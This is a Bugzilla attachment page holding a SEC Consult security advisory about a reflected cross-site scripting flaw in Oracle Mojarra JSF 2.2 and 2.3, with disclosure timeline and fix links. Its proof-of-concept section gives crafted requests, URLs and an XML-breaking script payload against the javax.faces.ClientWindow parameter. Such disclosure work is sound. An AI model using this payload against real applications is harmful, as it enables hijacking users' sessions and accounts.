Download
Getting Started
Members
Projects
Community
Marketplace
Events
Planet Eclipse
Newsletter
Videos
Participate
Report a Bug
Forums
Mailing Lists
Wiki
IRC
How to Contribute
Working Groups
Automotive
Internet of Things
LocationTech
Long-Term Support
PolarSys
Science
OpenMDM
More
Community
Marketplace
Events
Planet Eclipse
Newsletter
Videos
Participate
Report a Bug
Forums
Mailing Lists
Wiki
IRC
How to Contribute
Working Groups
Automotive
Internet of Things
LocationTech
Long-Term Support
PolarSys
Science
OpenMDM
Toggle navigation
Bugzilla – Attachment 278927 Details for
Bug 548244
Vulnerability within Oracle Mojarra JSF v2.2 and v2.3
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
Terms of Use
|
Copyright Agent
security advisory
advisory.txt (text/plain), 9.90 KB, created by
Jean-Benjamin Rousseau
on 2019-06-13 10:50:52 EDT
(
hide
)
Description:
security advisory
Filename:
MIME Type:
Creator:
Jean-Benjamin Rousseau
Created:
2019-06-13 10:50:52 EDT
Size:
9.90 KB
patch
obsolete
>Confidentiality class: Internal & Partner > >SEC Consult Vulnerability Lab Security Advisory < publishing date YYYYMMDD-0 > >======================================================================= > title: Reflected Cross-Site Scripting (XSS) > product: Oracle Mojarra JSF included in Java EE 7 > vulnerable version: 2.2 & 2.3 > fixed version: https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING > https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING > CVE number: > impact: High > homepage: https://javaserverfaces.github.io/ > found: 2018-11-12 > by: Jean-Benjamin Rousseau (Office Zurich) > Guillaume Crouquet (Office Zurich) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > >======================================================================= > >Vendor description: >------------------- >"JavaServer Faces technology simplifies building user interfaces for >JavaServer applications. Developers can build web applications by >assembling reuseable UI components in a page; connecting these >components to an application data source; and wiring client-generated >events to server-side event handlers. This project provides information >on the continued development of the JavaServer Faces specification. > >JavaServer Faces (JSF) is a JCP Standard technology for authoring >component based user interfaces on the Java EE platform." > >Source: https://javaee.github.io/javaserverfaces-spec/ > > >Business recommendation: >------------------------ >By exploiting the vulnerability documented in this advisory, an attacker >can execute arbitrary scripts in the context of the web application in the >victim's browser. Besides performing arbitrary actions within the >application with the victim's account or manipulating the application's >interface, the attacker can potentially steal session tokens, redirect >the victim to external pages and perform attacks against their browser. > >SEC Consult recommends to implement the available patch provided by Oracle. > > >Vulnerability overview/description: >----------------------------------- >The Oracle Mojarra implementation of JavaServer Faces (JSF) v2.2 and v2.3 >are concerned by a lack of input validation on the javax.faces.ClientWindow >parameter which can lead under certain conditions to Reflected Cross-Site >Scripting (XSS). >Oracle Mojarra JSF v2.2 and v2.3 are respectively the user interface >standards for Java EE 7 and Java EE 8. > >The vulnerability is not directly exploitable in Oracle Mojarra JSF v2.2 >and v2.3. However, different frameworks based on this library and having >a custom implementation of the Faces-Request HTTP headers for AJAX requests > can be concerned. PrimeFaces v6.0 is one example of a vulnerable framework. > >This vulnerability affects the web applications fulfilling the following >conditions: > - Usage of a framework based on Oracle Mojarra JSF v2.2 or v2.3 > - Usage of AJAX requests in the web applications > - Custom implementation of the Faces-Request HTTP headers for AJAX requests > - Presence of the javax.faces.CLIENT_WINDOW_MODE context parameter >set to "url" in the web.xml file: > ><context-param> > <param-name>javax.faces.CLIENT_WINDOW_MODE</param-name> > <param-value>url</param-value> ></context-param> > > >Proof of concept: >----------------- >In this Proof of Concept, the tests are based on PrimeFaces v6.0, >an open source framework for JSF. Other frameworks based on >Oracle Mojarra JSF 2.2 or 2.3 can also be concerned. > >Step 1: Generate an AJAX request on the web application and intercept it. >POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1 >Host: localhost:8080 >Content-Length: 405 >Accept: application/xml, text/xml, */*; q=0.01 >Origin: http://localhost:8080 >X-Requested-With: XMLHttpRequest >Faces-Request: partial/ajax >Content-Type: application/x-www-form-urlencoded; charset=UTF-8 >Accept-Encoding: gzip, deflate >Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 >Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163 >Connection: close > >javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 > >Step 2: Transpose the POST parameters into GET parameters and >build a new URL with it. >http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 > >Step 3: Strip out the javax.faces.ViewState GET parameter from the URL. >http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 > >Step 4: Prefix the javax.faces.ClientWindow GET parameter with >the following payload: >]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[ > >Resulting URL: >http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=]]></update><something%3ascript+xmlns%3asomething%3d"http%3a//www.w3.org/1999/xhtml">alert('SEC+Consult')</something%3ascript><update+id%3d"j_id1%3ajavax.faces.ClientWindow%3a0"><![CDATA[2a616ef87aeed7521b02ceb4e163%3A0 > >Step 5: To trigger the XSS, the victim needs to browse to the crafted link >on the previous step. > > >Vulnerable / tested versions: >----------------------------- >The following version has been tested: >* Oracle Mojarra JSF v2.2 included in Java EE 7 >* Oracle Mojarra JSF v2.3 included in Java EE 8 has not been tested > but is affected according to the vendor > > >Vendor contact timeline: >------------------------ >2018-11-22: Contacting vendor through secalert_us@oracle.com >2018-11-27: Initial response from Oracle. Monthly updates will be > provided until the issue is addressed. >2018-12-15: Request from Oracle for technical details. >2018-12-17: Response with requested details > Error in the transmission of the e-mail. >2019-01-11: Request from Oracle to delay the release date > when a fix will be provided. >2019-01-15: Approvement of the extension of the release and > retransmission of the technical details from > the previous mail. >2019-02-01: Request from Oracle to extend the release date after > the 16th of April 2019. >2019-02-04: Approvement for the extension of the release date. >2019-02-05: Acknowledgment of receipt from Oracle. >2019-04-11: Release of a fix for versions 2.2 and 2.3 of Oracle Mojarra JSF >2019-04-29: Announcement of a security issue in the fix and request for a > CVE number. > > >Solution: >--------- >Oracle have addressed the reported issue and fixes for 2.2 and 2.3 have been >checked in the github repo at: > >https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_2X_ROLLING >https://github.com/javaserverfaces/mojarra/commits/MOJARRA_2_3X_ROLLING > >JSF is part of Java EE SDK, but Java EE is not a supported product, so >Oracle will not be announcing the fixes through their Critical Patch Update. > > >Workaround: >----------- > > > >Advisory URL: >------------- >https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html > > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > >SEC Consult Vulnerability Lab > >SEC Consult >Europe | Asia | North America > >About SEC Consult Vulnerability Lab >The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It >ensures the continued knowledge gain of SEC Consult in the field of network >and application security to stay ahead of the attacker. The SEC Consult >Vulnerability Lab supports high-quality penetration testing and the evaluation >of new offensive and defensive technologies for our customers. Hence our >customers obtain the most current information about vulnerabilities and valid >recommendation about the risk profile of new technologies. > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ >Interested to work with the experts of SEC Consult? >Send us your application https://www.sec-consult.com/en/career/index.html > >Interested in improving your cyber security with the experts of SEC Consult? >Contact our local offices https://www.sec-consult.com/en/contact/index.html >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > >Mail: research at sec-consult dot com >Web: https://www.sec-consult.com >Blog: http://blog.sec-consult.com >Twitter: https://twitter.com/sec_consult > >EOF Jean-Benjamin Rousseau - Guillaume Crouquet / @2019
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 548244
: 278927